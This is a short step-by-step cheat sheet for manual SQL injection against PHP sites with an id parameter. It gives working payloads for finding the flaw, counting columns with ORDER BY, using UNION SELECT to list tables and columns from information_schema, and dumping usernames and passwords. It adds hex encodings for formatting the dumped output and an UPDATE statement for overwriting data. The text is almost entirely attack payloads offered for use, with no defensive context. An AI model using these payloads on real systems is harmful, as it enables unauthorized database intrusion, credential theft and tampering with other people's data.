1. Find a vulnerable add a ' at the end of the site exsample: news.php?id=1 add a ' at the end of the 1 and see if you get a sytax error
2. order by 1--
3. union all select 1,2,3,4,5--
4. @@version in vulnerable column
5. union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--
6. union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=char(x)--
7. union all select 1,2,3,4,group_concat(username,0x3a,password,0x3c62723e) from column_name--


Side note may need to add a - between like the *.php?id=-#

0x3a = :
0x3c62723e = <br>
0x557365726E616D653A = Username:
0x50617373776F72643A = Password:
0x456D61696C3A = Email:
UPDATE column_name SET table_name='Whateverhere',table_name='Whateverhere',table_name='Whateverhere'/*